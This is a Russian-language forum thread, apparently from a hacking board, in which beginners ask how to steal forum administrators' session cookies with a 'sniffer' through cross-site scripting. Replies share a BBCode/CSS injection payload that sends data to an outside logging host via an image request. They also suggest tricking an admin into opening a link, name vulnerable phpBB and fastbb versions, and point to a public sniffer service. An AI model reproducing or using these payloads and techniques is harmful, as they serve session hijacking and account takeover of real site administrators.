|
Простой вопрос про сниффер
Народ, такой вопрос:
Сниффером мы можем получать куки. Но только куки того процесса, где был выполнен Джаваскрипт. Следовательно, для использования сниффера, в любом случае требуется искать уязвимость, пропускающую Джаваскрипт? Тогда не очень ясен один вопрос - в статье про снифферы на Античате, неточно помню, был описан такой прием получения админских куков на форуме, как просьба посмотреть неоткрывающийся аватар (в котором сидит Js). Админу дается ссылка, и просится на нее зайти. Но вель тогда сниффер получит куки, которые относятся к новому открытому документу - странице с картинкой, и толку от этого никакого. То есть, главный вопрос: Можно ли как-нибудь использовать сниффер, если нет уязвимостей, пропускающих Js? |
Цитата:
http://site/chat/?userId=1234&room=3&pwd=qwerty Из этой строки можно узнать пароль )))))))))))))))))))))) |
Спасибо.
|
чтобы не создавать тему спрашиваю здесь....
когда мы пишем ссыдку на сниффер, то пишем ...+document.cookie а надо имеено это писать или заменять??? например, ....+админ@yandex.ru.txt??? очень важно, а то у меня ни разу не получалось получить файл...а точнее куки.... сасое большое, что я получаю, это ip адрес... |
Цитата:
Где ты в JS видел такое??? Например: Код:
[HT*ML][co*lor=white][EM*AIL][U*RL=wj`=`][/URL][/EMA*IL][/color]` style=`background:url(javascript:document.images[1].src="http://s.netsec.ru/nofear/pic.gif?;"+админ@yandex.ru.txt)` |
Мдаааааааааа!!!
Цитата:
админ@yandex.ru.txt. Немного подумав я сделал вывод что ты видимо хотел получить некий файл админ@yandex.ru.txt или файл админа с yandex.ru под названием yandex.ru.txt, ХА ХА ХА!!! ОБЛОМИСЬ ИМХО!!! =) Цитата:
Цитата:
Поверь мне ты получишь не только ip адресс, хотя..... наверное ТЫ ничего не получишь..... УЧИ МАТ ЧАСТЬ, ИМХО!!!!!!!! |
СДОХНУТЬ МОЖНО!!!!!!!!!!)))))))))))))))))))))))))))))) )))))))))))))))))))))))))) ну и ЛОЛЛЛЛЛЛЛЛЛ
когда мы пишем ссыдку на сниффер, то пишем ...+document.cookie а надо имеено это писать или заменять??? например, ....+админ@yandex.ru.txt??? http://www.azerilove.net/chat/converts/20.gif |
ну хорошо, лоханулся....
а в чем тогда проблема??? я даже на себе проверял.....пишу я нужный код, с помощью кодера (ну, ссылки на них где-то давали).....в сообщении оставляю ссылку, сам кликаю и на снифак приходит только Ip адрес жертвы.... что делать....ну помогите начинающему...все же когда-то были такими.... |
НА чем ты тестишь? НА форуме? Движок и версия какая?
|
да на форумах.....phpbb 2.0.18 или fastbb (версию не помню, но не самаЯ последняя, где-то предпоследняя...)
|
http://www.<a href="http://wj.com/st..._blank">wj</a>
Вот юзай эту XSS. Ты не забыл что все они работают, ТОЛЬКО в ОСЛИКЕ ? |
ТОЛЬКО в ОСЛИКЕ ?
в eMule что ли??? |
Цитата:
Осел - IE - Internet Explorer |
Цитата:
|
Вы чего - прям все родились с компом в руках? Он в этом не разбирается, зато, наверное, разбирается в пусковой части какого-нить психофазатрона альфа-частиц на молекулярном уровне... Лучше бы в двух постах объяснили на пальцах что такое снифер и зачем он.
|
http://antichat.ru/sniff/ вот тут объсняют популярно что такое сниффер)))там ещё есть сам сниффер и даже лог)))
|
| Время: 03:15 |